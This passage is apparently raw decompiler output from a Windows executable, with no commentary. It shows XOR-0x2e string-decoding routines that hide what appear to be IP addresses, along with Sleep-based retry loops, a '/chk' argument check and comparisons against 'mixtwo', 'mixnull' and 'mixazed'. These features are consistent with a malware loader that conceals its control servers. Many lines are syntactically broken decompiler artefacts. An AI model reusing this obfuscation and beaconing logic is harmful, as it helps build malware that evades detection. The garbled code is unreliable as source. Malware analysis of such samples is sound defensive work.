																																		__eflags = _t1210;
																																		_t719 =  ==  ? _v2576 : _t719 & 0x000000ff;
																																		_v572 = _t719;
																																	}
																																	__eflags = _t1268 - 0xa;
																																	if(_t1268 >= 0xa) {
																																		__eflags = _t1210 - 1;
																																		_t719 =  !=  ? _v2576 : _t719 & 0x000000ff;
																																		_v572 = _t719;
																																	}
																																	__eflags = _t1268 - 0xf;
																																	if(_t1268 < 0xf) {
																																		_v572 = _t719;
																																		__eflags = _t1268 - 5;
																																		if(_t1268 < 5) {
																																			goto L287;
																																		}
																																		goto L285;
																																	} else {
																																		__eflags = _t1210 - 1;
																																		if(_t1210 == 1) {
																																			_v572 = _t1210;
																																		}
																																		L285:
																																		__eflags = _t1087;
																																		if(_t1087 != 0) {
																																			goto L287;
																																		}
																																		__eflags = _t1210 - 0xfffffffe;
																																		if(_t1210 == 0xfffffffe) {
																																			_t1254 = Sleep;
																																			Sleep(0x7d0);
																																			goto L265;
																																		}
																																	}
																																	L287:
																																	__eflags = _t1210 - 1;
																																	_t1089 =  ==  ? 1 : _t1087 & 0x000000ff;
																																	_t1268 = _t1268 + 1;
																																	_v2604 =  ==  ? 1 : _t1087 & 0x000000ff;
																																	Sleep(0x7d0);
																																	__eflags = _v572;
																																} while (_v572 == 0);
																																L264:
																																_t1254 = Sleep;
																																goto L265;
																															}
																															__eflags = _v2576;
																															if(_v2576 != 0) {
																																goto L265;
																															}
																															__eflags =  *0x43cd10;
																															if( *0x43cd10 != 0) {
																																goto L265;
																															}
																															asm("o16 nop [eax+eax]");
																															do {
																																_v572 = _t1263 + 1;
																																_t757 = E00401E90( &_v668, E00408E60(E00407A70(_t1201, _t1254, _t1263 + 1)));
																																_t1201 =  &_v740;
																																_v16 = 0x26;
																																_t758 = E0040B130( &_v620,  &_v740, _t757);
																																_t1291 = _t1291 + 4;
																																_v16 = 0x27;
																																_t760 = E00401BF0(_t985,  &_v1588, _t1254, E00401D80(_t758));
																																E00401DC0(_t985,  &_v620);
																																_v16 = 0x23;
																																E00401DC0(_t985,  &_v668);
																																__eflags = _t760;
																																if(_t760 == 0) {
																																	goto L263;
																																}
																																_t1272 = E00401D00( &_v1588);
																																_v2576 = _t1272;
																																__eflags = _t1272 - 0x16;
																																if(__eflags <= 0) {
																																	goto L263;
																																}
																																_push( ~(0 | __eflags > 0x00000000) | _t1272 + 0x00000001);
																																_t1255 = E00414ABE();
																																_t765 = E00401C30( &_v1588, _t764, _t1272 + 1);
																																_push( ~(0 | __eflags > 0x00000000) | _v2576 * 0x00000002);
																																_t768 = E00414ABE();
																																_t1301 = _t1291 + 4 - 0x14;
																																_v2576 = _t768;
																																E0040A490(_t985, _t1301, _v2576 * 2 >> 0x20, _t764,  &_v884);
																																_t1201 = E00403050(_t985, _t764, _t765, _t1255,  &_v2576);
																																_t773 = E00402450(_v2576, _t772, __eflags,  &_v2604,  &_v2604);
																																_t1289 = _t1301 + 0x24;
																																_t1254 = _t773;
																																__eflags = _v2604;
																																if(_v2604 != 0) {
																																	goto L276;
																																}
																																L263:
																																_t1263 = _v572;
																																__eflags = _t1263 - 0xa;
																															} while (_t1263 < 0xa);
																															goto L264;
																														}
																														L255:
																														 *_t1254(0xbb8);
																													}
																												} else {
																													goto L246;
																												}
																											}
																											_t774 =  *_t642 & 0x000000ff;
																											if(_t774 != 0x30) {
																												asm("sbb eax, eax");
																												_t775 = _t774 | 0x00000001;
																												__eflags = _t775;
																											} else {
																												_t775 = 0;
																											}
																											if(_t775 == 0) {
																												goto L275;
																											} else {
																												goto L241;
																											}
																											L250:
																											 *_t1254(0xbb8);
																										}
																									}
																									_t1039 = _v2628;
																									_t1202 = _t1198 + 1;
																									_t777 = _t1039;
																									if(_t1202 < 0x1000) {
																										goto L230;
																									}
																									_t1039 =  *((intOrPtr*)(_t1039 - 4));
																									_t1202 = _t1202 + 0x23;
																									_t1426 = _t777 - _t1039 + 0xfffffffc - 0x1f;
																									if(_t777 - _t1039 + 0xfffffffc <= 0x1f) {
																										goto L230;
																									}
																									goto L229;
																								}
																								_t1136 = _v592;
																								_t1222 = _t1197 + 1;
																								_t780 = _t1136;
																								if(_t1222 < 0x1000) {
																									L225:
																									_push(_t1222);
																									E0040D5EF(_t1136);
																									_t1289 = _t1289 + 8;
																									goto L226;
																								}
																								_t1039 =  *((intOrPtr*)(_t1136 - 4));
																								_t1202 = _t1222 + 0x23;
																								if(_t780 -  *((intOrPtr*)(_t1136 - 4)) + 0xfffffffc > 0x1f) {
																									goto L229;
																								}
																								goto L225;
																							}
																							_t1137 = _v2652;
																							_t1223 = _t1196 + 1;
																							_t784 = _t1137;
																							if(_t1223 < 0x1000) {
																								L221:
																								_push(_t1223);
																								E0040D5EF(_t1137);
																								_t1289 = _t1289 + 8;
																								goto L222;
																							}
																							_t1039 =  *((intOrPtr*)(_t1137 - 4));
																							_t1202 = _t1223 + 0x23;
																							if(_t784 -  *((intOrPtr*)(_t1137 - 4)) + 0xfffffffc > 0x1f) {
																								goto L229;
																							}
																							goto L221;
																						}
																						_t1138 = _v2676;
																						_t1224 = _t1195 + 1;
																						_t788 = _t1138;
																						if(_t1224 < 0x1000) {
																							L217:
																							_push(_t1224);
																							E0040D5EF(_t1138);
																							_t1289 = _t1289 + 8;
																							goto L218;
																						}
																						_t1039 =  *((intOrPtr*)(_t1138 - 4));
																						_t1202 = _t1224 + 0x23;
																						if(_t788 -  *((intOrPtr*)(_t1138 - 4)) + 0xfffffffc > 0x1f) {
																							goto L229;
																						}
																						goto L217;
																					}
																					_t1139 = _v620;
																					_t1225 = _t1194 + 1;
																					_t792 = _t1139;
																					if(_t1225 < 0x1000) {
																						L213:
																						_push(_t1225);
																						E0040D5EF(_t1139);
																						_t1289 = _t1289 + 8;
																						goto L214;
																					}
																					_t1039 =  *((intOrPtr*)(_t1139 - 4));
																					_t1202 = _t1225 + 0x23;
																					if(_t792 -  *((intOrPtr*)(_t1139 - 4)) + 0xfffffffc > 0x1f) {
																						goto L229;
																					}
																					goto L213;
																				}
																				_t1140 = _v2600;
																				_t1226 = _t1193 + 1;
																				_t796 = _t1140;
																				if(_t1226 < 0x1000) {
																					L209:
																					_push(_t1226);
																					E0040D5EF(_t1140);
																					_t1289 = _t1289 + 8;
																					goto L210;
																				}
																				_t1039 =  *((intOrPtr*)(_t1140 - 4));
																				_t1202 = _t1226 + 0x23;
																				if(_t796 -  *((intOrPtr*)(_t1140 - 4)) + 0xfffffffc > 0x1f) {
																					goto L229;
																				}
																				goto L209;
																			}
																			_t1141 = _v668;
																			_t1227 = _t1192 + 1;
																			_t800 = _t1141;
																			if(_t1227 < 0x1000) {
																				L205:
																				_push(_t1227);
																				E0040D5EF(_t1141);
																				_t1289 = _t1289 + 8;
																				goto L206;
																			}
																			_t1039 =  *((intOrPtr*)(_t1141 - 4));
																			_t1202 = _t1227 + 0x23;
																			if(_t800 -  *((intOrPtr*)(_t1141 - 4)) + 0xfffffffc > 0x1f) {
																				goto L229;
																			}
																			goto L205;
																		}
																		_t1142 = _v2700;
																		_t1228 = _t1191 + 1;
																		_t804 = _t1142;
																		if(_t1228 < 0x1000) {
																			L201:
																			_push(_t1228);
																			E0040D5EF(_t1142);
																			_t1289 = _t1289 + 8;
																			goto L202;
																		}
																		_t1039 =  *((intOrPtr*)(_t1142 - 4));
																		_t1202 = _t1228 + 0x23;
																		if(_t804 -  *((intOrPtr*)(_t1142 - 4)) + 0xfffffffc > 0x1f) {
																			goto L229;
																		}
																		goto L201;
																	} else {
																		_t818 = 0;
																		do {
																			 *(_t818 + 0x43cf6c) =  *(_t818 + 0x43cf6c) ^ 0x0000002e;
																			_t818 = _t818 + 1;
																		} while (_t818 < 0xc);
																		goto L182;
																	}
																}
																_t825 =  *0x43ce78;
																_v568 = 0x2e1a;
																__eflags =  *0x43ce78 -  *((intOrPtr*)(_t1258 + 4));
																if( *0x43ce78 >  *((intOrPtr*)(_t1258 + 4))) {
																	E0040D738(_t825, 0x43ce78);
																	_t1283 = _t1283 + 4;
																	__eflags =  *0x43ce78 - 0xffffffff;
																	if(__eflags == 0) {
																		 *0x43cfac = _v568;
																		E0040DA4A(_t1017, __eflags, E0042B730);
																		E0040D6EE(0x43ce78);
																		_t1283 = _t1283 + 8;
																	}
																}
																_t826 =  *0x43cfad;
																__eflags = _t826;
																if(_t826 != 0) {
																	 *0x43cfac =  *0x43cfac ^ 0x0000002e;
																	_t843 = _t826 ^ 0x0000002e;
																	__eflags = _t843;
																	 *0x43cfad = _t843;
																}
																_t1143 = 0x43cfac;
																_v2600 = 0;
																_v2584 = 0;
																_v2580 = 0xf;
																do {
																	_t827 =  *_t1143;
																	_t1143 =  &(_t1143[1]);
																	__eflags = _t827;
																} while (_t827 != 0);
																_push(_t1143 - 0x43cfad);
																_t1145 =  &_v2600;
																E00402030( &_v2600, 0x43cfac);
																_t1230 = _v624;
																__eflags = _t1230 - 0x10;
																if(_t1230 < 0x10) {
																	L163:
																	asm("movups xmm0, [ebp-0xa1c]");
																	_t829 =  *0x43cd20;
																	_v572 = 0x5d5b;
																	asm("movups [ebp-0x278], xmm0");
																	_v565 = 0x2e;
																	asm("movq xmm0, [ebp-0xa0c]");
																	asm("movq [ebp-0x268], xmm0");
																	__eflags =  *0x43cd20 -  *((intOrPtr*)(_t1258 + 4));
																	if( *0x43cd20 >  *((intOrPtr*)(_t1258 + 4))) {
																		E0040D738(_t829, 0x43cd20);
																		_t1283 = _t1283 + 4;
																		__eflags =  *0x43cd20 - 0xffffffff;
																		if(__eflags == 0) {
																			 *0x43cdd4 = _v572;
																			 *0x43cdd6 = _v565;
																			E0040DA4A(_t1145, __eflags, E0042B720);
																			E0040D6EE(0x43cd20);
																			_t1283 = _t1283 + 8;
																		}
																	}
																	_t830 =  *0x43cdd6;
																	__eflags = _t830;
																	if(_t830 != 0) {
																		 *0x43cdd4 =  *0x43cdd4 ^ 0x0000002e;
																		 *0x43cdd5 =  *0x43cdd5 ^ 0x0000002e;
																		_t833 = _t830 ^ 0x0000002e;
																		__eflags = _t833;
																		 *0x43cdd6 = _t833;
																	}
																	_t1146 = 0x43cdd4;
																	_v2600 = 0;
																	_v2584 = 0;
																	_v2580 = 0xf;
																	do {
																		_t831 =  *_t1146;
																		_t1146 =  &(_t1146[1]);
																		__eflags = _t831;
																	} while (_t831 != 0);
																	_t1147 = _t1146 - 0x43cdd5;
																	__eflags = _t1147;
																	_push(_t1147);
																	_push(0x43cdd4);
																	L171:
																	_t1017 =  &_v2600;
																	E00402030( &_v2600);
																	asm("movups xmm0, [ebp-0xa1c]");
																	asm("movups [ebp-0x2a8], xmm0");
																	asm("movq xmm0, [ebp-0xa0c]");
																	asm("movq [ebp-0x298], xmm0");
																	goto L172;
																}
																_t1145 = _v644;
																_t1232 = _t1230 + 1;
																_t839 = _t1145;
																__eflags = _t1232 - 0x1000;
																if(_t1232 < 0x1000) {
																	L162:
																	_push(_t1232);
																	E0040D5EF(_t1145);
																	_t1283 = _t1283 + 8;
																	goto L163;
																}
																_t1039 =  *((intOrPtr*)(_t1145 - 4));
																_t1202 = _t1232 + 0x23;
																__eflags = _t839 -  *((intOrPtr*)(_t1145 - 4)) + 0xfffffffc - 0x1f;
																if(__eflags > 0) {
																	goto L229;
																}
																goto L162;
															}
															_t1017 = _v2628;
															_t1233 = _t1184 + 1;
															_t848 = _t1017;
															__eflags = _t1233 - 0x1000;
															if(_t1233 < 0x1000) {
																L150:
																_push(_t1233);
																E0040D5EF(_t1017);
																_t608 = _v572;
																_t1283 = _t1283 + 8;
																goto L151;
															}
															_t1039 =  *((intOrPtr*)(_t1017 - 4));
															_t1202 = _t1233 + 0x23;
															__eflags = _t848 -  *((intOrPtr*)(_t1017 - 4)) + 0xfffffffc - 0x1f;
															if(__eflags > 0) {
																goto L229;
															}
															goto L150;
														}
														_v568 = 0x2e1d;
														__eflags =  *0x43cea4 - _t603;
														if( *0x43cea4 > _t603) {
															E0040D738(_t603, 0x43cea4);
															_t1283 = _t1283 + 4;
															__eflags =  *0x43cea4 - 0xffffffff;
															if(__eflags == 0) {
																 *0x43cefc = _v568;
																E0040DA4A(_t1013, __eflags, E0042B760);
																E0040D6EE(0x43cea4);
																_t1283 = _t1283 + 8;
															}
														}
														_t858 =  *0x43cefd;
														__eflags = _t858;
														if(_t858 != 0) {
															 *0x43cefc =  *0x43cefc ^ 0x0000002e;
															_t874 = _t858 ^ 0x0000002e;
															__eflags = _t874;
															 *0x43cefd = _t874;
														}
														_t1148 = 0x43cefc;
														_v2600 = 0;
														_v2584 = 0;
														_v2580 = 0xf;
														do {
															_t859 =  *_t1148;
															_t1148 =  &(_t1148[1]);
															__eflags = _t859;
														} while (_t859 != 0);
														_push(_t1148 - 0x43cefd);
														_t1150 =  &_v2600;
														E00402030( &_v2600, 0x43cefc);
														_t1235 = _v624;
														__eflags = _t1235 - 0x10;
														if(_t1235 < 0x10) {
															L132:
															asm("movups xmm0, [ebp-0xa1c]");
															_t861 =  *0x43ced0;
															_v572 = 0x5b4b;
															asm("movups [ebp-0x278], xmm0");
															_v565 = 0x2e;
															asm("movq xmm0, [ebp-0xa0c]");
															asm("movq [ebp-0x268], xmm0");
															__eflags =  *0x43ced0 -  *((intOrPtr*)(_t1258 + 4));
															if( *0x43ced0 >  *((intOrPtr*)(_t1258 + 4))) {
																E0040D738(_t861, 0x43ced0);
																_t1283 = _t1283 + 4;
																__eflags =  *0x43ced0 - 0xffffffff;
																if(__eflags == 0) {
																	 *0x43ce7c = _v572;
																	 *0x43ce7e = _v565;
																	E0040DA4A(_t1150, __eflags, E0042B750);
																	E0040D6EE(0x43ced0);
																	_t1283 = _t1283 + 8;
																}
															}
															_t862 =  *0x43ce7e;
															__eflags = _t862;
															if(_t862 != 0) {
																 *0x43ce7c =  *0x43ce7c ^ 0x0000002e;
																 *0x43ce7d =  *0x43ce7d ^ 0x0000002e;
																_t864 = _t862 ^ 0x0000002e;
																__eflags = _t864;
																 *0x43ce7e = _t864;
															}
															_t1151 = 0x43ce7c;
															_v2600 = 0;
															_v2584 = 0;
															_v2580 = 0xf;
															do {
																_t863 =  *_t1151;
																_t1151 =  &(_t1151[1]);
																__eflags = _t863;
															} while (_t863 != 0);
															_push(_t1151 - 0x43ce7d);
															_push(0x43ce7c);
															goto L171;
														}
														_t1150 = _v644;
														_t1237 = _t1235 + 1;
														_t870 = _t1150;
														__eflags = _t1237 - 0x1000;
														if(_t1237 < 0x1000) {
															L131:
															_push(_t1237);
															E0040D5EF(_t1150);
															_t1283 = _t1283 + 8;
															goto L132;
														}
														_t1039 =  *((intOrPtr*)(_t1150 - 4));
														_t1202 = _t1237 + 0x23;
														__eflags = _t870 -  *((intOrPtr*)(_t1150 - 4)) + 0xfffffffc - 0x1f;
														if(__eflags > 0) {
															goto L229;
														}
														goto L131;
													}
													_t1013 = _v2628;
													_t1238 = _t1182 + 1;
													_t879 = _t1013;
													__eflags = _t1238 - 0x1000;
													if(_t1238 < 0x1000) {
														L119:
														_push(_t1238);
														E0040D5EF(_t1013);
														_t1283 = _t1283 + 8;
														goto L120;
													}
													_t1039 =  *((intOrPtr*)(_t1013 - 4));
													_t1202 = _t1238 + 0x23;
													__eflags = _t879 -  *((intOrPtr*)(_t1013 - 4)) + 0xfffffffc - 0x1f;
													if(__eflags > 0) {
														goto L229;
													}
													goto L119;
												}
												_t1154 =  >=  ?  *(_t985 + 8) : _t985 + 8;
												_v565 =  *((intOrPtr*)(_t985 + 0x1c)) - 0x10 >= 0;
												_t889 = E00402180( >=  ?  *(_t985 + 8) : _t985 + 8,  *((intOrPtr*)(_t985 + 0x18)),  >=  ?  *(_t985 + 8) : _t985 + 8, "mixtwo", 6);
												_t1283 = _t1283 + 0xc;
												if(_t889 != 0xffffffff) {
													L90:
													_t890 =  *0x43cef4;
													_v576 = 0x41564743;
													_v572 = 0x4b40;
													_v565 = 0x2e;
													__eflags =  *0x43cef4 -  *((intOrPtr*)(_t1258 + 4));
													if( *0x43cef4 >  *((intOrPtr*)(_t1258 + 4))) {
														E0040D738(_t890, 0x43cef4);
														_t1283 = _t1283 + 4;
														__eflags =  *0x43cef4 - 0xffffffff;
														if(__eflags == 0) {
															 *0x43cec0 = _v576;
															 *0x43cec4 = _v572;
															 *0x43cec6 = _v565;
															E0040DA4A(_t1154, __eflags, E0042B7C0);
															E0040D6EE(0x43cef4);
															_t1283 = _t1283 + 8;
														}
													}
													_t891 =  *0x43cec6;
													__eflags = _t891;
													if(_t891 != 0) {
														 *0x43cec0 =  *0x43cec0 ^ 0x0000002e;
														 *0x43cec1 =  *0x43cec1 ^ 0x0000002e;
														 *0x43cec2 =  *0x43cec2 ^ 0x0000002e;
														 *0x43cec3 =  *0x43cec3 ^ 0x0000002e;
														 *0x43cec4 =  *0x43cec4 ^ 0x0000002e;
														 *0x43cec5 =  *0x43cec5 ^ 0x0000002e;
														_t907 = _t891 ^ 0x0000002e;
														__eflags = _t907;
														 *0x43cec6 = _t907;
													}
													_t1155 = 0x43cec0;
													_v2600 = 0;
													_v2584 = 0;
													_v2580 = 0xf;
													do {
														_t892 =  *_t1155;
														_t1155 =  &(_t1155[1]);
														__eflags = _t892;
													} while (_t892 != 0);
													_push(_t1155 - 0x43cec1);
													E00402030( &_v2600, 0x43cec0);
													asm("movups xmm0, [ebp-0xa1c]");
													_t894 =  *0x43ced4;
													_v568 = 0x2e1f;
													asm("movups [ebp-0x2a8], xmm0");
													asm("movq xmm0, [ebp-0xa0c]");
													asm("movq [ebp-0x298], xmm0");
													__eflags =  *0x43ced4 -  *((intOrPtr*)(_t1258 + 4));
													if( *0x43ced4 >  *((intOrPtr*)(_t1258 + 4))) {
														E0040D738(_t894, 0x43ced4);
														_t1283 = _t1283 + 4;
														__eflags =  *0x43ced4 - 0xffffffff;
														if(__eflags == 0) {
															 *0x43cf90 = _v568;
															E0040DA4A( &_v2600, __eflags, E0042B7B0);
															E0040D6EE(0x43ced4);
															_t1283 = _t1283 + 8;
														}
													}
													_t895 =  *0x43cf91;
													__eflags = _t895;
													if(_t895 != 0) {
														 *0x43cf90 =  *0x43cf90 ^ 0x0000002e;
														_t902 = _t895 ^ 0x0000002e;
														__eflags = _t902;
														 *0x43cf91 = _t902;
													}
													_t1158 = 0x43cf90;
													_v2600 = 0;
													_v2584 = 0;
													_v2580 = 0xf;
													do {
														_t896 =  *_t1158;
														_t1158 =  &(_t1158[1]);
														__eflags = _t896;
													} while (_t896 != 0);
													_push(_t1158 - 0x43cf91);
													_t1017 =  &_v2600;
													E00402030( &_v2600, 0x43cf90);
													_t1242 = _v624;
													__eflags = _t1242 - 0x10;
													if(_t1242 < 0x10) {
														L108:
														asm("movups xmm0, [ebp-0xa1c]");
														asm("movups [ebp-0x278], xmm0");
														asm("movq xmm0, [ebp-0xa0c]");
														asm("movq [ebp-0x268], xmm0");
														goto L172;
													}
													_t1017 = _v644;
													_t1243 = _t1242 + 1;
													_t898 = _t1017;
													__eflags = _t1243 - 0x1000;
													if(_t1243 < 0x1000) {
														L107:
														_push(_t1243);
														E0040D5EF(_t1017);
														_t1283 = _t1283 + 8;
														goto L108;
													}
													_t1039 =  *((intOrPtr*)(_t1017 - 4));
													_t1202 = _t1243 + 0x23;
													__eflags = _t898 -  *((intOrPtr*)(_t1017 - 4)) + 0xfffffffc - 0x1f;
													if(__eflags > 0) {
														goto L229;
													}
													goto L107;
												}
												_t1154 =  !=  ?  *(_t985 + 8) : _t985 + 8;
												_t914 = E00402180( !=  ?  *(_t985 + 8) : _t985 + 8,  *((intOrPtr*)(_t985 + 0x18)),  !=  ?  *(_t985 + 8) : _t985 + 8, "mixnull", 7);
												_t1283 = _t1283 + 0xc;
												if(_t914 != 0xffffffff) {
													goto L90;
												}
												_t1154 =  !=  ?  *(_t985 + 8) : _t985 + 8;
												_t915 = E00402180( !=  ?  *(_t985 + 8) : _t985 + 8,  *((intOrPtr*)(_t985 + 0x18)),  !=  ?  *(_t985 + 8) : _t985 + 8, "mixazed", 7);
												_t1283 = _t1283 + 0xc;
												if(_t915 != 0xffffffff) {
													goto L90;
												}
												_t916 =  *0x43cf68;
												_v576 = 0x5a564743;
												_v572 = 0x4159;
												_v565 = 0x2e;
												if( *0x43cf68 >  *((intOrPtr*)(_t1258 + 4))) {
													E0040D738(_t916, 0x43cf68);
													_t1283 = _t1283 + 4;
													_t1373 =  *0x43cf68 - 0xffffffff;
													if( *0x43cf68 == 0xffffffff) {
														 *0x43ce60 = _v576;
														 *0x43ce64 = _v572;
														 *0x43ce66 = _v565;
														E0040DA4A(_t1154, _t1373, E0042B790);
														E0040D6EE(0x43cf68);
														_t1283 = _t1283 + 8;
													}
												}
												_t917 =  *0x43ce66;
												if(_t917 != 0) {
													 *0x43ce60 =  *0x43ce60 ^ 0x0000002e;
													 *0x43ce61 =  *0x43ce61 ^ 0x0000002e;
													 *0x43ce62 =  *0x43ce62 ^ 0x0000002e;
													 *0x43ce63 =  *0x43ce63 ^ 0x0000002e;
													 *0x43ce64 =  *0x43ce64 ^ 0x0000002e;
													 *0x43ce65 =  *0x43ce65 ^ 0x0000002e;
													 *0x43ce66 = _t917 ^ 0x0000002e;
												}
												_t1162 = 0x43ce60;
												_v2600 = 0;
												_v2584 = 0;
												_v2580 = 0xf;
												do {
													_t918 =  *_t1162;
													_t1162 =  &(_t1162[1]);
												} while (_t918 != 0);
												_push(_t1162 - 0x43ce61);
												E00402030( &_v2600, 0x43ce60);
												asm("movups xmm0, [ebp-0xa1c]");
												_t920 =  *0x43ce4c;
												_v568 = 0x2e1c;
												asm("movups [ebp-0x2a8], xmm0");
												asm("movq xmm0, [ebp-0xa0c]");
												asm("movq [ebp-0x298], xmm0");
												if( *0x43ce4c >  *((intOrPtr*)(_t1258 + 4))) {
													E0040D738(_t920, 0x43ce4c);
													_t1283 = _t1283 + 4;
													_t1378 =  *0x43ce4c - 0xffffffff;
													if( *0x43ce4c == 0xffffffff) {
														 *0x43ce2c = _v568;
														E0040DA4A( &_v2600, _t1378, E0042B780);
														E0040D6EE(0x43ce4c);
														_t1283 = _t1283 + 8;
													}
												}
												_t921 =  *0x43ce2d;
												if(_t921 != 0) {
													 *0x43ce2c =  *0x43ce2c ^ 0x0000002e;
													 *0x43ce2d = _t921 ^ 0x0000002e;
												}
												_t1165 = 0x43ce2c;
												_v2600 = 0;
												_v2584 = 0;
												_v2580 = 0xf;
												do {
													_t922 =  *_t1165;
													_t1165 =  &(_t1165[1]);
												} while (_t922 != 0);
												_push(_t1165 - 0x43ce2d);
												_t1017 =  &_v2600;
												E00402030( &_v2600, 0x43ce2c);
												_t1248 = _v624;
												if(_t1248 < 0x10) {
													goto L108;
												}
												_t1017 = _v644;
												_t1249 = _t1248 + 1;
												_t924 = _t1017;
												if(_t1249 < 0x1000) {
													L89:
													_push(_t1249);
													E0040D5EF(_t1017);
													asm("movups xmm0, [ebp-0xa1c]");
													_t1283 = _t1283 + 8;
													asm("movups [ebp-0x278], xmm0");
													asm("movq xmm0, [ebp-0xa0c]");
													asm("movq [ebp-0x268], xmm0");
													goto L172;
												}
												_t1039 =  *((intOrPtr*)(_t1017 - 4));
												_t1202 = _t1249 + 0x23;
												if(_t924 -  *((intOrPtr*)(_t1017 - 4)) + 0xfffffffc > 0x1f) {
													goto L229;
												}
												goto L89;
											}
											_t1009 = _v2628;
											_t1250 = _t1180 + 1;
											_t940 = _t1009;
											if(_t1250 < 0x1000) {
												L67:
												_push(_t1250);
												E0040D5EF(_t1009);
												_t596 = _v572;
												_t1283 = _t1283 + 8;
												goto L68;
											}
											_t1039 =  *((intOrPtr*)(_t1009 - 4));
											_t1202 = _t1250 + 0x23;
											if(_t940 -  *((intOrPtr*)(_t1009 - 4)) + 0xfffffffc > 0x1f) {
												goto L229;
											}
											goto L67;
										}
										_t1005 = _v2652;
										_t1251 = _t1178 + 1;
										_t949 = _t1005;
										if(_t1251 < 0x1000) {
											L56:
											_push(_t1251);
											E0040D5EF(_t1005);
											_t1283 = _t1283 + 8;
											goto L57;
										}
										_t1039 =  *((intOrPtr*)(_t1005 - 4));
										_t1202 = _t1251 + 0x23;
										_t1356 = _t949 - _t1039 + 0xfffffffc - 0x1f;
										if(_t949 - _t1039 + 0xfffffffc > 0x1f) {
											goto L229;
										}
										goto L56;
									}
									_t1167 = _v2652;
									_t1252 = _t1176 + 1;
									_t953 = _t1167;
									if(_t1252 < 0x1000) {
										L52:
										_push(_t1252);
										E0040D5EF(_t1167);
										_t1283 = _t1283 + 8;
										goto L53;
									}
									_t1039 =  *((intOrPtr*)(_t1167 - 4));
									_t1202 = _t1252 + 0x23;
									if(_t953 -  *((intOrPtr*)(_t1167 - 4)) + 0xfffffffc > 0x1f) {
										goto L229;
									}
									goto L52;
								} else {
									asm("movups xmm0, [0x43cdfc]");
									_t957 = 0x10;
									asm("movaps xmm1, [0x437d50]");
									asm("pxor xmm1, xmm0");
									asm("movups [0x43cdfc], xmm1");
									asm("o16 nop [eax+eax]");
									do {
										 *(_t957 + 0x43cdfc) =  *(_t957 + 0x43cdfc) ^ 0x0000002e;
										_t957 = _t957 + 1;
									} while (_t957 < 0x1a);
									goto L47;
								}
								L40:
								_t580 =  *_t996;
								_t996 = _t996 + 1;
								if(_t580 != 0) {
									goto L40;
								} else {
									_push(_t996 - _t1173);
									E00402030( &_v764, 0x43cf9c);
									_v16 = 4;
									_t582 =  *0x43cf14; // 0x0
									_v604 = 0x5c4f5c4c;
									_v600 = 0x465e0057;
									_v596 = 0x2e5e;
									if(_t582 >  *((intOrPtr*)(_t1258 + 4))) {
										E0040D738(_t582, 0x43cf14);
										_t1283 = _t1283 + 4;
										_t1347 =  *0x43cf14 - 0xffffffff;
										if( *0x43cf14 == 0xffffffff) {
											asm("movaps xmm0, [0x437d70]");
											asm("movups [0x43cdfc], xmm0");
											asm("movq xmm0, [ebp-0x250]");
											asm("movq [0x43ce0c], xmm0");
											 *0x43ce14 = _v596;
											E0040DA4A( &_v764, _t1347, 0x42b7f0);
											E0040D6EE(0x43cf14);
											_t1283 = _t1283 + 8;
										}
									}
									goto L44;
								}
							} else {
								_t962 = 0;
								asm("o16 nop [eax+eax]");
								do {
									 *(_t962 + 0x43cf9c) =  *(_t962 + 0x43cf9c) ^ 0x0000002e;
									_t962 = _t962 + 1;
								} while (_t962 < 0xf);
								goto L39;
							}
							L32:
							_t577 =  *_t993;
							_t993 = _t993 + 1;
							if(_t577 != 0) {
								goto L32;
							} else {
								_push(_t993 - _t1172);
								E00402030( &_v740, 0x43cdec);
								_v16 = 3;
								_t579 =  *0x43ce44; // 0x0
								_v584 = 0x1c1f1c;
								_v580 = 0x1c171f;
								_v576 = 0x1f1a1c;
								_v572 = 0x181f;
								_v565 = 0x2e;
								if(_t579 >  *((intOrPtr*)(_t1258 + 4))) {
									E0040D738(_t579, 0x43ce44);
									_t1283 = _t1283 + 4;
									_t1342 =  *0x43ce44 - 0xffffffff;
									if( *0x43ce44 == 0xffffffff) {
										asm("movq xmm0, [ebp-0x23c]");
										 *0x43cfa4 = _v576;
										 *0x43cfa8 = _v572;
										asm("movq [0x43cf9c], xmm0");
										 *0x43cfaa = _v565;
										E0040DA4A( &_v740, _t1342, 0x42b810);
										E0040D6EE(0x43ce44);
										_t1283 = _t1283 + 8;
									}
								}
								goto L36;
							}
						} else {
							_t969 = 0;
							do {
								 *(_t969 + 0x43cdec) =  *(_t969 + 0x43cdec) ^ 0x0000002e;
								_t969 = _t969 + 1;
							} while (_t969 < 0xe);
							goto L31;
						}
						L24:
						_t574 =  *_t990;
						_t990 = _t990 + 1;
						if(_t574 != 0) {
							goto L24;
						} else {
							_push(_t990 - _t1171);
							E00402030( &_v716, 0x43cedc);
							_v16 = 2;
							_t576 =  *0x43cfb0; // 0x0
							_v584 = 0x1c001f1d;
							_v580 = 0x1c001e1f;
							_v576 = 0x1a1f001e;
							_v572 = 0x2e17;
							if(_t576 >  *((intOrPtr*)(_t1258 + 4))) {
								E0040D738(_t576, 0x43cfb0);
								_t1283 = _t1283 + 4;
								_t1336 =  *0x43cfb0 - 0xffffffff;
								if( *0x43cfb0 == 0xffffffff) {
									asm("movq xmm0, [ebp-0x23c]");
									 *0x43cdf4 = _v576;
									asm("movq [0x43cdec], xmm0");
									 *0x43cdf8 = _v572;
									E0040DA4A( &_v716, _t1336, 0x42b840);
									E0040D6EE(0x43cfb0);
									_t1283 = _t1283 + 8;
								}
							}
							goto L28;
						}
					}
					_t978 =  *_t988;
					_t1170 = "/chk";
					if(_t978 !=  *_t1170) {
						__eflags = _t978 -  *_t1170;
						if(_t978 !=  *_t1170) {
							L15:
							asm("sbb eax, eax");
							_t979 = _t978 | 0x00000001;
							__eflags = _t979;
							goto L16;
						}
						_t978 = _t988[1];
						__eflags = _t978 - _t1170[1];
						if(_t978 != _t1170[1]) {
							goto L15;
						}
						_t978 = _t988[2];
						__eflags = _t978 - _t1170[2];
						if(_t978 != _t1170[2]) {
							goto L15;
						}
						_t978 = _t988[3];
						__eflags = _t978 - _t1170[3];
						if(__eflags != 0) {
							goto L15;
						} else {
							_t979 = 0;
							goto L16;
						}
					} else {
						_t988 =  &(_t988[_t1257]);
						_t979 = 0;
						L16:
						_t1330 = _t979;
						if(_t979 != 0) {
							goto L18;
						}
						L17:
						E00407F90( &_v220, _t988);
						_t1283 = _t1283 - 0xc;
						_t988 =  &_v220;
						E00409DF0( &_v220, _t1170, _t1330, "test");
						E0041647D(0);
						goto L18;
					}
				}
				_t983 =  *_t988 & 0x000000ff;
				if(_t983 != 0x63) {
					L5:
					asm("sbb eax, eax");
					_t984 = _t983 | 0x00000001;
					__eflags = _t984;
					L6:
					if(_t984 == 0) {
						goto L17;
					}
					goto L7;
				}
				_t983 = _t988[1] & 0x000000ff;
